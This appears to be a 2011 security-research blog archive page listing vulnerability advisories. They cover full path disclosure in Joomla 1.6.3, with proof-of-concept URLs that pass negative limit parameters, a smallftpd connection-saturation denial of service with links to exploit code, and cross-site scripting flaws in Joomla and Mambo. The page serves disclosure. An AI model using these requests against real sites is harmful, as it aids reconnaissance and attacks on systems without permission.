Posts

Showing posts from June, 2011

Full Path Disclosure | Joomla! 1.6.3 and lower (parameters: limitstart, limit , component: com_content)

SEO Mode: =========== http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limitstart=-1 http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limit=-1&limitstart=1 SEO Mode Off ============ http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=-5&view=archive&option=com_content&limitstart=1 http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=5&view=archive&option=com_content&limitstart=-1 --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability 1. OVERVIEW The smallftpd FTP server is found to be vulnerable to denial of service in handling multiple connection requests regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or reject new FTP login requests. 2. BACKGROUND The smallftpd FTP server isis a small and simple muli-threaded ftp server for windows. 3. VERSIONS AFFECTED 1.0.3-fix and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb http://www.exploit-db.com/download/17455 5. SOLUTION The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place. 6. VENDOR Arnaud Mary 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net , YGN Ethical Hacker Group, Myanmar. 8. REFERENCES Original Advisor

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities 1. OVERVIEW Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Script

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION Multiple parameters (task, menu, menutype, zorder, search, client, section) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 (current as